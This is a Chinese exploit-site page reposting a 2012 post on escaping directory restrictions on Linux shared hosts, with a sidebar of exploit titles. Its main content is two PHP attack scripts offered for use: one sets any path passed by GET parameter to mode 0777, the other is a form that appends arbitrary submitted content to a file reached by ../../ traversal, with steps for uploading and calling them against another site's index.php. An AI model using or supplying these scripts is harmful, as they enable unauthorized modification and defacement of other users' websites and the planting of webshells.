首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux提权之跨目录访问拿webshell代码
来源:http://hi.baidu.com/met3or 作者:met3or 发布时间:2012-02-20  

linux主机的权限设置一般情况下都很松散,少有的一些还是不能直接跨目录访问。

在linux不能提权的情况下,可以试试这些代码来跨目录试试。

第一个exp代码:

PHP代码
  1. <?php  
  2. $path = stripslashes($_GET['path']);  
  3. $ok = chmod ($path , 0777);  
  4. if ($ok == true)  
  5. echo CHMOD OK , Permission editable file or directory. Permission to write;  
  6. ?>  

把以上代码保存为pahuai.com.PHP

访问http://www.ckpis.com/pahuai.com.php?path=../../要跨的目录/index.php

这里的index.PHP是要修改权限的文件。

 

第二个exp代码:

PHP代码
  1. <?php  
  2. @$filename = stripslashes($_POST['filename']);  
  3. @$mess = stripslashes($_POST['mess']);  
  4. $fp = @fopen({$_POST['filename']}, 'a');  
  5. @fputs($fp,$mess <hr size=1 color=black>);  
  6. @fclose($fp);  
  7. ?>  
  8. <form name=form1 action=exploit.php method=post>  
  9. <p align=center><b>  
  10. <br>  
  11. CODE :<br>  
  12. <textarea name=mess rows=3></textarea></font></b></textarea>  
  13. </font></b> <p><input type=hidden name=filename value=../../路径/index.php></p>  
  14. <center>  
  15. <input type=reset name=Submit value=Delete>  
  16. <input name=go type=submit value=Send onClick=javascript:this.style.visibility ='hidden';>  
  17. <center>  
  18. </form>  
  19. <meta http-equiv=Content-Type content=text/html; charset=iso-8859-1>  
  20. <title>Changing CHMOD Permissions Exploit – Contact : the_gl4di4t0r[AT]hotmail[DOT]com</title>  
  21. </head>  
  22. <body>  
  23. </center>  
  24. </body>  

把代码保存为ckpis.com.php注意代码中的路径。

用的时候要改成访问的目录和文件。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PCAnywhere 12.5.0 build 463 De
·Blade API Monitor Unicode Bypa
·Horde 3.3.12 Backdoor Arbitrar
·DJ Studio Pro 5.1.6.5.2 SEH Ex
·Java MixerSequencer Object GM_
·Core FTP Server 1.2 Build 422
·windows xp sp2 [ ARABIC] backc
·linux/x86 BackShell-TCP bash[/
·DAMN Hash Calculator v1.5.1 Lo
·Mercurycom MR804 Router Denial
·TrendMicro Control Manger <= v
·Orbit Downloader URL Unicode C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved